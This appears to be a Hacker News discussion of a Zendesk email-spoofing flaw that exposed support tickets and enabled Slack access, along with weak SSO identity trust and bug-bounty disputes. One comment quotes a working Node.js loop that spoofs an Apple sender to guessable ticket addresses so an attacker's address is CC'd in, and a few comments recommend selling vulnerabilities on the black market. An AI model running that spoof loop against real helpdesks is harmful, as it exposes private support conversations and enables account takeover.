Reported this exact bug to Zendesk, Apple, and Slack in June 2024, both through HackerOne and by escalating directly to engineers or PMs at each company.
I doubt we were the first. That is presumably the reason they failed to pay out.
The real issue is that non-directory SSO options like Sign in with Apple (SIWA) have been incorrectly implemented almost everywhere, including by Slack and other large companies we alerted in June.
Non-directory SSO should not have equal trust vs. directory SSO. If you have a Google account and use Google SSO, Google can attest that you control that account. Same with Okta and Okta SSO.
SIWA, GitHub Auth, etc. are not doing this. They rely on a weaker proof, usually just control of the email at a single point in time.
SSO providers are not fungible, even if the email address is the same. You need to take this into account when designing your trust model. Most services do not.
I do web app testing and report a similar issue as a risk rather often to my clients. You can replace Google below with many other identity providers.
Imagine Bob works at Example Inc. and has email address [email protected]
Bob can get a Google account with primary email address [email protected]. He can legitimately pass verification.
Bob then gets fired for fraud or sexual harassment or something else gross misconduct-y and leaves his employer on bad terms.
Bob still has access to the Google account [email protected]. It didn't get revoked when they fired him and locked his accounts on company systems. He can use the account indefinitely to get Google to attest for his identity.
Example Inc. subscribes to several SaaS apps that offer Google as an identity provider for SSO. The SaaS app validates that he can get a trusted provider to authenticate that he has an @example.com email address and adds him to the list of permitted users. Bob can use these SaaS apps years later and pull data from them despite having left the company on bad terms. This is bad.
I think the only way for Example Inc. to stop this in the case of Google would be to create a workspace account and use the option to prove domain ownership and force accounts that are unmanaged to either become managed or change their address by a certain date. https://support.google.com/a/answer/6178640?hl=en
Other providers may not even offer something like this, and it relies on Example Inc. seeking out the identity providers, which seems unreasonable. How do you stop your corporate users signing up for the hot new InstaTwitch gaming app or Grinderble dating service that you have never heard of and using that to authenticate to your sales CRM full of customer data?
This is the right answer for this problem. If you're not interested in being a paying workspace customer, get cloud identity free and verify your domain. You can then take over and/or kick out any consumer users in the domain.
Every time I've left an organization, they have swiftly deleted the company email address/revoked my access to it. I assume every reasonable organization will have processes in place to do this.
I don't see this as a vulnerability: how is Google supposed to know that a person has left the company? You let them know by deleting the account.
In the above example, the normal flow to get a Google address [email protected] relies on setting DNS records for company.com, both to prove control of the domain as well as to route email to that domain. There may be an exploit/bypass I'm not seeing, but I legitimately don't see any way a user who has a legitimate [email protected] email address hosted somewhere besides Google Workspace could then set up a [email protected] email address with Google.
If there's a way to do this, I would greatly appreciate a link or brief explanation, as our process for employee termination/resignation does involve disabling in the Google admin portal and if we need to be more proactive I definitely want to know.
The issue here is that if company.com does not use Google Workspace and hasn't claimed company.com, then any employee can sign up for a "consumer" Google account using [email protected].
There are legitimate reasons for this, e.g. imagine an employee at a company that uses Office365 needing to set up an account for Google Adwords.
You can sign up for Google with an existing email. So if example.com is all on MS365, that's where the admins control stuff. No Google Workspace at all, no DNS records or proof of domain to anyone but MS.
So anyone with an example.com email can make a Google account using that email as their login. Verify they have the email, and that's their login. A common setup for users who need to use Google Ads or Analytics.
But when the company disables the 365 login, the Google account remains. And if you use a third-party service that offers "Sign in with Google" and assumes that because you have a Google account ending in "@example.com" you are verified as example.com, you've got access even though the email account is disabled.
If you have the google admin portal this doesn't work as you're controlling it there. But signing up for Microsoft or Apple accounts with that google workspace address might have the same loophole.
That removes you from their system. If I make a GitHub account using [email protected], GitHub doesn't get notified that I got fired from example.com, so I can keep using my GitHub [email protected] account in places that ask GitHub if I'm [email protected] even though I don't have access to that email anymore.
This no longer happens for services whose accounts follow a social media model. For such accounts, employees are expected to use their own accounts (presumably with followers, reputation, etc.) and keep them after leaving the company. For real social media, this is probably fine, but I don't understand why we accept this model for Github and Gitlab (and Sourceware before that). Even from an employee perspective, it's not great because it makes it unclear who owns what, especially with services like Github which have rules about how many accounts one person can create, and under what circumstances.
I have no idea how this is supposed to work in practice for Github and Gitlab, where people gain access to non-public areas of those websites, but they are still expected to use their own accounts which they keep after leaving their employer.
(The enterprise-managed Github accounts do not address this because they prevent public, upstream collaboration.)
This is why you store and match on the sso provider’s uuid, not on the email address. Emails are not a unique identifier and never have been. Someone can delete their email account and later someone else can sign up and claim the same email. Anyone matching on email addresses is doing it wrong. I’ve tried to argue this to management at companies I’ve worked at in the past, but most see my concern as paranoid.
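A minimal sketch of what that looks like (hypothetical in-memory storage; `iss` and `sub` are the standard OIDC claims for the issuer and the provider's stable subject identifier):

```javascript
// Accounts keyed on issuer + subject, never on the email string.
const accounts = new Map();

function findOrCreateAccount(idToken) {
  const key = `${idToken.iss}:${idToken.sub}`; // stable per provider account
  if (!accounts.has(key)) {
    // Email is stored as display/contact data only, never as the lookup key.
    accounts.set(key, { key, email: idToken.email });
  }
  return accounts.get(key);
}
```

With this scheme, a deleted-and-re-registered email, or two providers asserting the same address, can never collide into one account.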
I wonder why Google would make an SSO assertion along the lines of "yes, this user Bob has email address [email protected]" in the situation where example.com is not under a Workspace account. Such assertions ought to be made only for Workspace (and Google's own domains such as gmail.com, googlemail.com, etc.) since outside of that it's obsolete proof as you say, i.e. it's merely a username of a Google account which happens to look like an email address, and nothing more.
I read the GP's question as "why" would Google allow that in the first place?
The reason is obvious: because a Google account gets you access to many a Google service without requiring you to open a Gmail account.
However, the question still stands: why does Google allow authentication with a non-Gmail/Workspace account? Yes, it would be confusing since not all Google Accounts would be made the same, but this entire class of security issues would disappear.
So it's the usual UX convenience vs security.
Alternative "fix" that's both convenient and secure is to have every company use Google Apps on their domain ;-)
Perhaps the following could be a solution to this issue?
Any OAuth provider should send a flag called "attest_identity_ownership" (true/false) as part of the auth flow, which is set to true if the account is a workspace account or Gmail (or the equivalent for other services), and false if the email is an outside email. Thus, the service handling the login could decide whether to trust the login or proceed otherwise, e.g. by telling the user to use a different OAuth service/internal mechanism where the identity is attested.
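On the relying-party side, consuming such a flag could look like this sketch (to be clear, `attest_identity_ownership` is a proposal here, not an existing OAuth/OIDC claim):

```javascript
// Decide what to do with a login based on the hypothetical attestation flag.
function handleLogin(claims) {
  if (claims.attest_identity_ownership === true) {
    // Provider actively manages this identity: safe to trust the email.
    return { action: 'login', email: claims.email };
  }
  // Provider only checked the email once, at account creation:
  // fall back to verifying current mailbox control ourselves.
  return { action: 'verify_email_ourselves', email: claims.email };
}
```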
If anyone wants a motivating example for such unmanaged users, I actively use this feature. I have my own Google Workspace on my own domain. Years ago when I bought a Nest product I found that I couldn't use a Google Workspace account to access Nest. No problem: I created a consumer Google account under my Google Workspace domain. The email looks just like a Workspace account, and it doesn't need any additional Workspace licenses. (I no longer plan to buy any more Nest devices, so I'll delete the account once my last Nest product stops working.)
Presumably one of the PMs you’re referring to has posted this article for additional information. Feels like they’re doubling down on their initial position.
> Although the researcher did initially submit the vulnerability through our established process, they violated key ethical principles by directly contacting third parties about their report prior to remediation. This was in violation of bug bounty terms of service, which are industry standard and intended to protect the white hat community while also supporting responsible disclosure. This breach of trust resulted in the forfeiture of their reward, as we maintain strict standards for responsible disclosure.
Wow... there was no indication that they even intended to fix the issue, so what was Daniel hackermondev supposed to do? Disclosing this to the affected users was probably the most ethical thing to do. I don't think he posted the vulnerability publicly until after the fix. "Forfeiture of their reward" -- they said multiple times that it didn't qualify; they had no intention of ever giving a reward.
As someone who manages a bug bounty program, this kind of pisses me off.
For some of the bugs we get on H1, we openly say, "Hey, we need to see a POC in order to get this triaged." We do not provide test accounts for H1 users, so if a hunter ends up exploiting a customer's instance to demonstrate a bug, we'll not only take the amount that customer paid off their renewal price, we'll also pay the bounty hunter.
Fwiw, I wouldn't be surprised if the author of this article is a bit upset that Daniel hackermondev gained a significant % of the income that the author makes a year. If this was "fixed" by Zendesk, they would have paid less than a few % from the 50k they actually made.
Edit: to those downvoting, the fact of the matter is that Zendesk's maximum bounty is far lower than 50k; yet OP made 50k; meaning by definition the value of the vulnerability was at least 50k.
If anything, they are probably upset that they apparently lost some customers over this. That must (rightfully) hurt. But it's their own mistake - leaving a security bug unaddressed is asking for trouble.
He didn't even "go public" as that term is normally used in bug disclosure. He didn't write it up and release an exploit when Zendesk told him it was out of scope and gave him no indication they considered it a problem or were planning a fix. Instead he reached out to affected companies in an at least semi-private way, and those companies considered the bug serious enough to pay him $50k collectively and, in at least some cases, drop Zendesk altogether.
I am 100% certain that every one of the companies that paid the researcher would consider the way this was handled by that researcher "the best alternative to HackerOne rules 'ethical disclosure' in the face of a vendor trying to cover up serious flaws".
In an ideal world, in my opinion HackerOne should publicly revoke Zendesk's account for abusing the rules and rejecting obviously valid bug payouts.
Aren't such disputes about scope relatively common? Not sure what Hackerone can do about it.
For example, most Hackerone customers exclude denial-of-service issues because they don't want to encourage people to bring down their services with various kinds of flooding attacks. That doesn't mean that the same Hackerone customers (or their customers) wouldn't care about a single HTTP request bringing down service for everyone for a couple of minutes. Email authentication issues are similar, I think: obviously on-path attacks against unencrypted email have to be out of scope, but if things are so badly implemented that off-path attacks somehow work too, then that really has to be fixed.
Of course, what you really shouldn't do as a Hackerone customer is use it as a complete replacement for your incoming security contact point. There are always going to be scope issues like that, or people unable to use Hackerone at all.
Once they'd brushed him off and made it clear they were not interested in listening to him, resolving the bug, or living up to the usual expectations that researchers have in companies claiming to have bug bounties on HackerOne, I'd say they lost any reasonable expectation that he'd do that.
I'll note he did go to the effort of taking the first stab at that sort of resolution, when he pushed back on HackerOne's inaccurate triage of the bug as an SPF/DKIM/DMARC email issue. He clearly understood the need for triage for programs like this, and that the HackerOne internal triage team didn't understand the actual problem, but again was rebuffed.
When in doubt, go with the side which has been forthcoming. Zendesk didn’t publish details and wrote their post misleadingly describing it as a supply chain problem sounding almost as if they were a victim rather than the supplier of the vulnerability. It’s always possible that there are additional details which haven’t come out yet but that impression of a weasel-like PM is probably accurate.
That article claims to have “0 comments”, but currently sits at a score of -7 (negative 7) votes of helpful/not helpful. I think they have turned off comments on that article, but aren’t willing to admit it.
EDIT: It’s -11 (negative 11) now. Still “0 comments”.
In damage control mode, Zendesk can't pay a bounty out here? Come on. This is amateur hour. The reputational damage that comes from "the company that goes on the offensive and doesn't pay out legitimate bounties" impacts the overall results you get from a bug bounty program. "Pissing off the hackers" is not a way to keep people reporting credible bugs to your service.
I don't understand what this tries to accomplish. The problem is bad, botching the triage is bad, and the bounty is relatively cheap. I understand that this feels bad from an egg-on-face perspective, but I would much rather be told by a penetration tester about a bug in a third-party service provider than not be told at all just to respect a program's bug bounty policy.
> "Pissing off the hackers" is not a way to keep people reporting credible bugs to your service.
That doesn’t matter if your goal with a bug bounty program is not to have people reporting bugs, but instead to have the company appear to care about security. If your only aim is to appear serious about security, it doesn’t matter what you actually do with any bug reports. Until the bugs are made public, of course, which is why companies so often try to stop this by any means.
sounds like a great way to get a bunch of black hats to target you after pissing off the white hats. Playing nice with people this smart should be precisely to prevent this kind of damage to a company that results in losing clients.
But I guess corporations ignoring security for more immediately profitable ventures on the quarterly report is a tale as old as software.
"Hi, we are ZenDesk, a support ticket SaaS with a bug bounty program that we outsource to our effected customers, who pay out an order of magnitude more than our puny fake HackerOne program. Call now, to be ridiculously upsold on our Enterprise package!"
We, the company that doesn't understand security, can't tell whether this was exploited, therefore we confidently assert that everything is fine. It's self consistent I suppose but I wouldn't personally choose to scream "we are incompetent and do not care" into the internet.
As a former ZD engineer, shame on you Mr Cusick (yes, I know you personally) and shame on my fellow colleagues for not handling this in a more proactive and reasonable way.
Another example of impotent PMs, private equity firms meddling and modern software engineering taking a back seat to business interests. Truly pathetic. Truly truly pathetic.
This is very important to keep in mind when implementing OAuth authentication! Not every SSO provider is the same. Even if the SSO provider tells you that the user's email is X, they might not even have confirmed that email address! Don't trust it and confirm the email yourself!
Use OIDC. It is based on OAuth. I would fiddle with implementing basic OAuth clients first, like a Spotify playlist fetcher or something, just to start getting a feel for the flows and the things you need to be concerned with.
[1] - They had to go commercial to stay afloat; there weren't enough contributions from the community/etc. That said, it's pretty cheap for what it does in the .NET space.
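The first leg of an OAuth authorization-code flow is just building the authorize URL and sending the user there. A sketch using Spotify's documented authorize endpoint (the client ID and redirect URI below are placeholders you'd register in the Spotify developer dashboard):

```javascript
// Build the user-facing authorization URL for the authorization-code flow.
function buildAuthorizeUrl({ clientId, redirectUri, scope, state }) {
  const url = new URL('https://accounts.spotify.com/authorize');
  url.searchParams.set('response_type', 'code');
  url.searchParams.set('client_id', clientId);
  url.searchParams.set('redirect_uri', redirectUri);
  url.searchParams.set('scope', scope);
  url.searchParams.set('state', state); // CSRF protection: verify on callback
  return url.toString();
}
```

After the user approves, the provider redirects back with `?code=...&state=...`; you verify `state` matches, then exchange the code for tokens server-side.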
Can you explain a bit more what makes Sign in with Apple different from Google Sign-in? Apple certainly does maintain a list of users with accounts. So what does "non-directory" mean here exactly? Why can Apple not attest that you control that account at sign-in time?
Now? nothing.
I think this thinking is a relic of Google's status as seemingly the last remaining email provider to automatically create a Gmail account when you signed up for a Google account. Using Google SSO meant using your Gmail account, and so control of the email address was necessary for control of the Google account. If you lose the email account, you lose the Google account. This is not true anymore, since you can sign up for a Google account with any email.
Whereas you can (and I believe always could*) create an Apple ID with any old email address.
*Maybe this delinked situation only came about when they added the App Store to OS X, and figured they'd make less money if they required existing Mac users to get a new email account in order to buy programs in the manner which grants Apple a cut.
Apple has a list of all the email addresses for its Apple IDs, but it doesn't control them, and having one deleted doesn't necessarily affect the other.
Google and custom-domain email have always been delinked from this perspective. You could create a Google account with a custom domain and then point the domain elsewhere or lose control of it, and you'd still retain control of the account.
Basically, the directory-SSO case is essentially theoretical at this point - it only works for employees at companies that also happen to provide SSO services. So if you work at Facebook, Google, Apple, or Github and have a [email protected] email address, and you signed into Slack through the SSO affiliated with your company and the company email, but you later stop working there and your work account access is revoked, you won't be able to use that SSO to sign into Slack. That's what they mean by directory control or whatever.
In contrast, if you sign up to Github with your work email account, unless it's a managed account controlled by your work, your work doesn't actually control the account. They just vouched for your affiliation at sign-up when you verified your email. So if you use Github SSO to sign up for a service that 'verifies' your work email address from Github during the process, that won't change when you leave and the company revokes access to the email. Github SSO, in this case, isn't verifying that you have an email account @company.com. It is verifying that you once had access to it. This is what they mean by the non-directory whatever.
I think what he means is, if you have an @gmail.com account via Google, that is pretty good proof of control. But if you have any other e-mail (e.g. a custom domain) via Google, it's not.
Similar with Apple, if you were signing in with an @icloud.com, it's pretty good proof, but if you have an Apple ID with a third-party e-mail it's not proof of current control of that e-mail.
That helps, but I still don't have a full picture. What's the threat here? Is it that: if a hacker gains temporary access to Bob's email [email protected], they can create an Apple account attached to it, and use that account to sign in with a service ABC, then that hacker gains access to Bob's private info in service ABC? But if the hacker already has email access, can't he just log into service ABC directly anyway?
Also, is it impossible to have a Google account with a non-gmail address? The original poster seemed to be saying that Google _is_ a directory SSO and Apple _is not_ categorically. But if you can have a Google account without a Gmail-ran email account, wouldn't Google have the same vulnerability?
I think the most likely threat in this case is with ex-employees. If Bob has access to [email protected] and creates an Apple account with it, then subsequently gets fired from example.com, they might delete his email address but his Apple account will still allow him to login to services using Sign in with Apple. (Because Apple only checks ownership of the email address when the Apple account is being created.)
Google accounts have the exact same issue so I don't understand the distinction made by the OP though.
You can also sign up for a google account using a non-gmail email address without creating a new gmail address, providing the domain owner hasn't created a workspace account with that domain in the past.
This can be done with an account that you once had control over but don't anymore, like if you leave an employer.
You can't send mail from it, but many apps will take having a Google account with a given email as proof of ownership, or an @example.com email address as proof that you are an employee of Example Inc. when they are a customer of the app and have a tenant set up.
Isn't the simplest solution here to not support SSO at all?
I get there's a convenience factor, but even more convenient is the password manager built into every modern browser and smartphone. If the client decides to use bad passwords, that will hurt them whether or not they're using SSO.
It sounds like the author got stiffed by Zendesk on this bug, $0 due to email spoofing being out of scope.
The $50k was from other bug bounties he was awarded on hackerone.
It's too bad Zendesk basically said "thanks" but then refused to pay anything. That's a good way to get people not to bother with your bug bounty program. It is often better to build goodwill than to be a stickler for rules and technicalities.
Side note: I'm not too surprised, as I had one of the worst experiences ever interviewing with Zendesk a few years back. I have never come away from an interview hating a company, except for Zendesk.
> That's a good way to get people not to bother with your bug bounty program.
And possibly to have blackhats to start looking more closely, since they now know both 1) that whitehats are likely to be focusing elsewhere leaving more available un-reviewed attack surface, and 2) that Zendesk appears to be the sort of company who'll ignore and/or hide known vulnerabilities, giving exploits a much longer effective working time.
If "the bad guys" discovered this (or if it had been discovered by a less ethically developed 15 year old who'd boasted about it in some Discord or hacker channel) I wonder just how many companies would have had interlopers in their Slack channels harvesting social engineering intelligence or even passwords/secrets/API keys freely shared in Slack channels? And I wonder how many other widely (or even narrowly) used 3rd party SaaS platforms can be exploited via Zendesk in exactly the same way. Pretty much any service that uses the email domain to "prove" someone works for a particular company and then grants them some level of access based on that would be vulnerable to having ZenDesk leak email confirmations to anybody who knows this bug.
Hell, I suspect it'd work to harvest password reset tokens too. That could give you account takeover for anything not using 2FA (which is, to a first approximation over the whole internet, everything).
If I am not mistaken, it wasn't zendesk that didn't want to recognize the bug, but HackerOne that did not escalate to Zendesk that they should reconsider the exclusion ground in this case.
As an aside, I wonder if those bounties in general reflect the real value of those bugs. The economic damage could be way higher, given that people share logins in support tickets.
I would have expected the price on the black market for these kinds of bugs to be several times larger.
The author specifically stated: "Realizing this, I asked for the report to be forwarded to an actual Zendesk staff member for review", before getting another reply from H1. I read this as: they escalated it to Zendesk directly, who directed it back to HackerOne.
It wasn't clear to me as even at that point it was an "H1 Mediator" who responded.
Also the bit about SPF, DKIM and DMARC seems to show a misunderstanding of the issue: these are typically excluded because large companies aren't able to do full enforcement on their email domains due to legacy. It's a common bug report.
In this case, the problem was that Zendesk wasn't validating emails from external systems.
It doesn't matter if the decision that this bug doesn't matter came from a Zendesk employee or Zendesk contractor (in this case H1). Zendesk authorized them to make decisions on the matter.
The audacity to say "this is out of scope" then "how dare you tell anyone else" is something else.
In this case, that probably means that H1 had a Zoom or Slack convo with the team and is relaying their decision into text instead of making them write it down themselves.
Yeah probably, but what information did H1 relay to them? Did they read the email, or did they get H1's interpretation of the bug? Because the SPF/DKIM/DMARC stuff really doesn't make sense in context.
> If I am not mistaken, it wasn't zendesk that didn't want to recognize the bug, but HackerOne that did not escalate to Zendesk that they should reconsider the exclusion ground in this case.
Correct, the replies seem to have come from H1 triage and H1 mediation staff.
They often miss the mark like this. I opened a H1 account to report that I'd found privileged access tokens for a company's GitHub org. H1 triage refused to notify the company because they didn't think it was a security issue and ignored my messages.
> If I am not mistaken, it wasn't zendesk that didn't want to recognize the bug
While it's unclear at which stage Zendesk became involved, in the "aftermath" section it's clear they knew of the H1 report, since they responded there. And later on the post says:
"Despite fixing the issue, Zendesk ultimately chose not to award a bounty for my report. Their reasoning? I had broken HackerOne's disclosure guidelines by sharing the vulnerability with affected companies."
The best case scenario as I see it is that Zendesk has a problem they need to fix with their H1 triage process and/or their in- and out-of-scope rules there. And _none_ of that is the researcher's problem.
The worst (and in my opinion most likely) scenario, is that Zendesk did get notified when the researcher asked H1 to escalate their badly triaged denial to Zendesk for review, and Zendesk chose to deny any bounty and tried to hide their vulnerability.
> As an aside, I wonder if those bounties in general reflect the real value of those bugs. The economic damage could be way higher, given that people share logins in support tickets.
I think it's way worse than that, since internal teams often share logins/secrets/API keys (and details of architecture and networking that a smart blackhat would _love_ to have access to) in their supposedly "internal" Slack channels. I think the fact that non-Zendesk "affected companies" paid out $50k sets that as the absolute lower bound of "the real value of those bugs". And it's _obvious_ that the researcher didn't contact _every_ vulnerable Slack-using organisation. I wonder how much more he could have made by disclosing this to 10 or 100 times as many Slack-using organisations, and delaying/stalling revealing his exploit POC to Zendesk while that money kept rolling in?
I'll be interested to see if HackerOne reacts to this, to keep the next researcher from going straight for this "second level" of bug bounty payouts: not bothering with H1 or the vulnerable company, and instead disclosing to companies affected by the vulnerability rather than the company with the vulnerability. It's kinda well known that H1 bounties are relatively small compared to the effort required to craft a tricky POC. But people disclose there anyway, presumably partly out of ethical concerns and partly for the reputation boost. But now we know you can probably get an order of magnitude more money by approaching affected third-party companies instead of cheapskate or outright abusive companies with H1 bounties that they choose to downvalue and not pay out on.
Hackerone staff are not that good. They usually mark anything from a non-famous person as a duplicate (even if it differs in nuances which eventually lead to much more impact) or straight-up out of scope.
I think it's just laziness. Plus they hire previously famous reporters as the people triaging the reports; those famous people know other famous people first-hand, and they usually think "hmm, unknown guy, must have run a script and submitted this".
I stopped reporting stuff about 5 years ago due to the frustration. And it seems the situation is still the same even after so many years.
I believe their logic was that only the domain owner can adequately prevent email spoofing by proper SPF/DMARC configuration, and that it’s the customers’ fault if they don’t do that. Which isn’t entirely wrong.
In a past life I was involved in a bug bounty program. I don't think the reasoning is as detailed.
When you stand up a bug bounty program you get a ton of "I opened developer tools, edited the js on your page, and now the page does something bad" submissions. "I can spoof some email headers and send an email to myself that looks like it is coming from you" isn't something I've specifically seen due to some weird details about my bounty program but it is something I would absolutely expect for many programs to see.
So you need a mechanism to reject this stuff. But if that mechanism is just "triage says this is dumb" you get problems. People scream at you for having their nonsense bug rejected. People submit dozens of very slightly altered "bugs" to try to say "you rejected the last one for reason X but this one does Y." So you create a general policy: anything involving email spoofing is out of scope.
So then a real bug ends up in front of the triage person. They are tired and busy and look at the report and see "oh this relies on email spoofing, close as out of scope." Sucks.
I think that Zendesk's follow up here is crap. They shouldn't be criticizing the author for writing about this bug. But I do very much understand how things end up with a $0 payout for the initial report.
Right, but I would be really shocked if Zendesk's internal email handler was doing any SPF/DKIM/DMARC validation at all. So even if a domain has DMARC set up, Zendesk is probably ignoring it. Which is probably pretty reasonable given how rare DMARC reject/quarantine has been historically.
> Create an Apple account with [email protected] email and request a verification code, Apple sends verification code from [email protected] to [email protected] and Zendesk automatically creates a ticket
I agree with your point, but that email's not the best example, because it would have passed SPF/DMARC/DKIM. It's a step or two later that involved sending a spoofed email from [email protected]:
const sendmail = require('sendmail')();

// Assuming the ticket you created in step #2 was assigned a ticket ID
// of #453, the verification email landed somewhere near there.
const range = [448, 457];

for (let i = range[0]; i < range[1]; i++) {
  // Send spoofed emails from Apple to Zendesk
  sendmail({
    from: '[email protected]',
    to: `support+id${i}@company.com`,
    cc: '[email protected]',
    subject: '',
    html: 'comment body',
  }, function (err, reply) {
    console.log(err && err.stack);
    console.dir(reply);
  });
}
This is exactly my point: if Apple has SPF/DKIM/DMARC configured correctly, then Zendesk should be validating the email sender. That they didn't is technically an SPF/DKIM/DMARC issue - a bug in Zendesk - but it is not a customer misconfiguration issue.
You don't want overly strict technical validation on your helpdesk contact points, though. They're supposed to be reachable when things are broken. So it's not as easy as just reconfiguring incoming mail relays. You might need separate domains for extended validation, or a reliable (!) way to relay authentication results to those mail endpoints that need it. Come to think of it, presenting email validation results to helpdesk staff might be a good idea in general.
Good, it gives NOERROR, which indicates the existence of subdomains. Just to be sure, we check some other arbitrary non-existing subdomain, to see if it gives NXDOMAIN as it should:
Since it gives the expected NXDOMAIN, this strongly indicates that there are DNS records present on subdomains of “_domainkey.id.apple.com”; i.e. DKIM keys.
(Of course, if you have ever received e-mail from an address @id.apple.com, you would see the selector name in the DKIM signature header, and could look up the corresponding DKIM record directly. The above method is for when you don’t have access to that.)
Future hackers, take note. If vulnerabilities you discover have any chance of being misinterpreted as "out of scope" by some bureaucrat at HackerOne, even though they're obviously applicable and dangerous, sell them on the market instead.
Maybe because the issue is not about Apple's DNS records, the vulnerability is in scope. One could argue the issue is in Zendesk's feature of adding people to a ticket via an email.
I wonder how redirects from [email protected] to Zendesk work. If it's via MX records pointing to Zendesk, then it's Zendesk's fault for not checking DMARC.
If it's another type of redirect, then yes, you can blame customers for not verifying DMARC.
HackerOne declared the issue out of scope so I don't see why disclosure would make a difference here. Had this person not notified different companies, they still wouldn't get a dime from HackerOne.
Bad showings all around, for both HackerOne and Zendesk.
(There's a not-very-convincing argument that they declared the ability to view support tickets as out of scope, but were not given a chance to assess the Slack takeover exploit's scope.)
The Slack takeover exploit is a problem on Slack's end (and sounds more like a configuration issue than a bug) so Zendesk would not be responsible for that anyway though.
Don't get me wrong, Zendesk definitely has their own separate problem: you should not be able to CC yourself onto an existing support ticket by emailing a guessable ticket ID.
But simultaneously you should not be able to get into a company Slack by simply having an account with a @company.com email address created by a third-party SSO provider.
In other words, even if Zendesk fixed their problem, Slack would still have a problem on their end.
I too had the worst interview experience with zendesk. The people I talked to were pretty senior folks too. They just seem to have a very petty and toxic work culture.
The black market also exists because the potential payout for serious 0days by official programs is almost always less than what a third-party adversary will pay (if the target(s) for them are worth it).
The same presentation also mentions (starting slide 17) how the requirements of 0days differs from public research, which is why some vulnerabilities would be difficult to sell.
This. Fortunately the law makes it that it’s inconvenient (possible prison time) to use the black market, which is a big thumb on the balance, but bug bounties are also often only $3000…
> Fortunately the law makes it that it’s inconvenient (possible prison time) to use the black market
Don't forget that most people also simply don't sell bugs. They're not for sale in the first place; the bounty would be a thank-you or nice bonus, not a replacement for selling it
I'm certainly not in a criminal bubble so I can't say how big the other side is, but (as a security consultant who knows a reasonable number of hackers) I doubt that I know anyone who'd choose, after getting no response from the company, to sell a bug for profit to a louche party rather than going full disclosure and warning everyone -- or just doing nothing because it's not like it's their problem
Edit: nvm someone did come to mind. We tried to steer them onto the right path at our weekly CTF team meetings but I'm not sure we succeeded. Anywho, still one to a few dozen
Which law makes it a criminal sanction to use a black market like darknet marketplaces?
Software exploits aren't considered arms; they're information that can be sold. The liability is on the person who does the unauthorized access, the person who steals data, the person who uses the data.
Hacking syndicates distribute liability akin to any corporation.
>which puts the liability on the person that does the unauthorized access
Which is almost always the person finding the bug. Most services include language that limit your ability to find vulnerabilities in their systems as part of being allowed to access their service. If you find the vulnerability without ever accessing the service you might have an out, but that also means you have to sell the exploit with less ability to convince the buyer that it is something significant.
You will typically be held liable for who you are selling your bugs to. If your bug ends up in the wrong hands you can’t just say “but I deal with everyone”.
> Side note: I'm not too surprised, as I had one of the worst experiences ever interviewing with Zendesk a few years back. I have never come away from an interview hating a company, except for Zendesk.
Same thing happened to me years ago. Interviewed with them and it was the worst “screening” experience I ever had. After getting a rejection email, I thanked them for their time and said I had feedback about the interview should they want to hear it. They said yes, please.
Same, it was a time-wasting interview experience. They seemed interested and not interested at the same time. They pinged me for a different role after passing me up for the first one, but didn't get any response from me after that.
Beg bounty hunters are not to blame for utterly abysmal responses by these platforms. Especially after they ghost the researcher and then moan about publication.
Proper response would be to update your program to triage these vulns and thank the researcher for not going public straight away. This current approach is burning a tremendous amount of goodwill.
You can’t triage them yourself, is the point, because you get two dozen bogus beg bounties each day - this is a full-time job!
So you need such a platform, and so on.
I help corporates evaluate and buy software. Having an ineffective bug bounty program, especially one that rewards black market activity on a terms & conditions technicality like this, is enough for me to put a black mark on your software services.
I don’t care if you’re the only company in the market, I’ll still blackball you for this in my recommendations.
Zendesk should pay up, apologize and correct their bug bounty program. After doing so, they should kindly ask the finder to add an update to this post, because otherwise it will follow them around like dogshit under their shoe.
They should absolutely inform a client company of a perceived threat, when they agree on the threat
Most of the person’s post and responses here are about Zendesk’s issue, but Zendesk was never informed
For a better PR response, I think Zendesk could now reward this after realizing it wouldn't have been disclosed first, and admonish HackerOne for not informing them and for the current policies there.
> Most of the person’s post and responses here are about Zendesk’s issue, but Zendesk was never informed
It's not clear whether they were informed. The mediator's email says "after consultations with *the team*", which is likely referring to Zendesk's security team.
It took Zendesk several months to fix the issue anyway, and they also didn’t acknowledge the author with what should be a very sizeable bounty. It’s not every day that someone tries to warn you about a massive security hole and then goes out of their way to warn your clients for you because you ignored them.
Zendesk was informed. OP specifically said they asked H1 to escalate to the company itself, and the second email they present was from someone at Zendesk, who still rejected them, adding that this decision was made “after consulting with the team”.
A $1.3 billion revenue company being too tight to pay this after all, even on their 2nd chance, is so short-sighted it's absurd. They're putting out a huge sign saying "When you find a vuln, definitely contact all our clients because we won't be giving you a penny!".
Incredible. This must be some kind of "damaged ego" or ass-covering, as it's clearly not a rational decision.
Edit: Another user here has pointed out the reasoning
> It's owned by private equity. Slowly cutting costs and bleeding the brand dry
It all makes sense if you consider bug bounties are largely:
1) created for the purpose of either PR/marketing, or a checklist ("auditing"),
2) seen as a cheaper alternative to someone who knows anything about security - "why hire someone that actually knows anything about security when we can just pay a pittance to strangers and believe every word they say?"
The amusing and ironic thing about the second point is that by doing so, you waste time with the constant spam of people begging for bounties and reporting things that are not even bugs let alone security issues, and your attention is therefore taken away from real security benefits which could be realized elsewhere by talented staff members.
I don’t agree. Bug bounties are taken seriously by at least some companies. Where I have worked, we received very useful reports, some very severe, via HackerOne.
The company even ran special sessions where engineers and hackers were brought together to try to maximize the number of bugs found in a few week period.
It resulted in more secure software at the end and a community of excited researchers trying to make some money and fame on our behalf.
The root cause in this case seems to be that they couldn’t get by HackerOne’s triage process because Zendesk excluded email from being in scope. This seems more like incompetence than malice on both of their parts. Good that the researcher showed how foolish they were.
This feels like a case in the gray area. On the one hand, companies need to declare certain stuff out of scope - whether they know about it and are planning to work on it, or consider it acceptable risk - as the point for the company is to improve their security posture within the scope of the resources they have to run the bug bounty program. What's weird here is that the blog author found an email problem that wasn't really in that DKIM/SPF etc. area, and Zendesk claimed that exemption covered it. Without a broader PoC to show how it could be weaponized, it's hard to say that Zendesk was egregiously wrong here - the person triaging just lacked the imagination to figure out that it would be a real problem. Hell, later in the write-up we learn Zendesk does do spam filtering on the inbound emails, and so it's not crazy to think a security engineer reading the report may assume that stuff would cover their butts, when it failed miserably here. (A good engineer would check that assumption, though.)
That said, putting my security hat on, I have to ask: who thought that sequential ticket IDs in the reply-to email address were a good idea? They really ought to be using long random nonces, at which point the "guess the right ID to become part of the support thread" attack falls apart. Classic enumeration+IDOR. So it sounds like there's still potential for abuse here, if you can sneak stuff by their filters.
>Without a broader PoC to show how it could be weaponized, it's hard to say that Zendesk was egregiously wrong here
The implications of being able to read arbitrary email contents from arbitrary domains' support (or other) addresses are well known, and any competent member of Zendesk's security team should know this is exactly what can happen.
